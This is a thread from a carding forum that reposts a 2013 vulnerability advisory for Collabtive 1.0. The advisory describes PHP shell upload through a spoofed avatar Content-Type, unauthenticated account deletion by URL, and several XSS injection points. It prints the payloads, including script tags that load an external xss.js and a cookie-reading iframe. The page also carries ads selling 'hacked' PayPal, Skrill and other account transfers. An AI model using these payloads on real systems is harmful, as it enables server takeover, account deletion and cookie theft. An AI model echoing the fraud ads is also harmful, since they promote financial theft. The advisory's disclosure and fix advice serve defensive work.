We are closing registration and public forum view to Paid & Private in 16 days! CLICK HERE to register FREE.
 
Create an account  

For users privacy, our last domains: CarderHack.com and OmertaHack.net are moved to CardingTeam.ws

Deposit & Withdraw | About Verified Sellers and Escrow | Advertise | Scam Report | Tracking Number Details | ICQ: 717039384

carding forums carding forums
carding forums carding forums
carding forums Paid adv expire in 48 days
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
 
Collabtive 1.0 XSS / Shell Upload / Privilege Escalation

#1
Code:
=============================================
- Release date: July 22th, 2013
- Discovered by: Enrico Cinquini
- Severity: High
=============================================
I. VULNERABILITY
-------------------------
Collabtive multiple vulnerabilities.
II. INTRODUCTION
-------------------------
The last version of Collabtive (1.0) is affected by multiple
vulnerabilities.
IV. DESCRIPTION
-------------------------
1) UPLOAD PHP FILE INSIDE AVATAR:
In the following function:
https://hostname/secprj/manageuser.php?action=edit
it's possible to upload a php file inside avatar by modifying the
Content-Type
as following:
Content-Type: image/jpeg
The file will be uploaded inside the standard directory and encoded with a
six-characters number at the end of the file, like the following example:
https://hostname/secprj/files/standard/avatar/uploadedshell_104185.php
It's really fast to enumerate all the possibility and to execute the file
uploaded.
This vulnerability was identified in older releases, but it's still present.
2) ACCOUNT DELETION
It's possible to delete any account from every user, by calling the
following URL:
https://hostname/secprj/manageuser.php?action=del&id=5
By setting the value "del" to parameter "action", the account with setted
ID will be
deleted, even if will apper an error message.
An "User" account with no privilege can delete all kind of account,
including Administrators.
3) CROSS SITE SCRITPING - CHAT:
The application is vulnerable to XSS attack in the managechat.php page. The
parameter affected is 'userto':
https://hostname/secprj/managechat.php?userto=<SCRIPT/XSS SRC="
https://ha.ckers.org/xss.js"></SCRIPT>&uid=2
4) CROSS SITE SCRITPING - TIMETRACKER
The page managetimetracker.php is affected by Cross Site Scripting
vulnerability.
The POST parameters 'start' and 'end' are vulnerable, for example, to the
following XSS:
"><SCRIPT/XSS SRC="https://ha.ckers.org/xss.js"></SCRIPT>
5) CROSS SITE SCRITPING - Multiple vulnerabilities:
The application is vulnerable to XSS attack in different pages:
manageproject.php
managemilestone.php
managetask.php
managemessage.php
To exploit the vulnerability it's necessary to set a new object name
(project, milestone,
task, message) like the following example:
"><SCRIPT/XSS SRC="https://ha.ckers.org/xss.js"></SCRIPT>
the script will be executed in the same page, and in dashboard,too.
6) CROSS SITE SCRITPING - PROFILE
The page manageuser.php?action=editform is affected by Cross Site Scripting
vulnerability.
All the profile fields are vulnerable, for example, to the following
injection:
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
VI. BUSINESS IMPACT
-------------------------
An attacker could upload malicious file, delete accounts and perform XSS
attacks.
VII. SYSTEMS AFFECTED
-------------------------
Version 1.0 is vulnerable.
VIII. SOLUTION
-------------------------
It's necessary to:
- implement a strong upload filter to prevent the upload of malicious file
- implement an input validation mechanism to avoid being vulnerable to XSS
injection
- review and correct users profiling to prevent a user can delete other
accounts
IX. REFERENCES
-------------------------
Collabtive website:
https://collabtive.o-dyn.de
X. CREDITS
-------------------------
The vulnerability has been discovered by:
Enrico Cinquini enrico(dot)cinquini(at)gmail(dot)com
XI. VULNERABILITY HISTORY
-------------------------
June 20th, 2013: Vulnerability identification
June 21th, 2013: Vendor notification
July 22th, 2013: Vulnerability disclosure
# 363C6753259330E6   1337day.com [2013-07-23]   6A45A824321E408F #
Reply
Paid adv. expire in 47 days
CLICK to buy Advertisement !

    Verified & Trusted HACKED Payza, PayPal, Ukash, Ucard, EgoPay, Skrill - TRANSFER [Escrow accepted]


#2
Pls where can I get this
Reply



Forum Jump: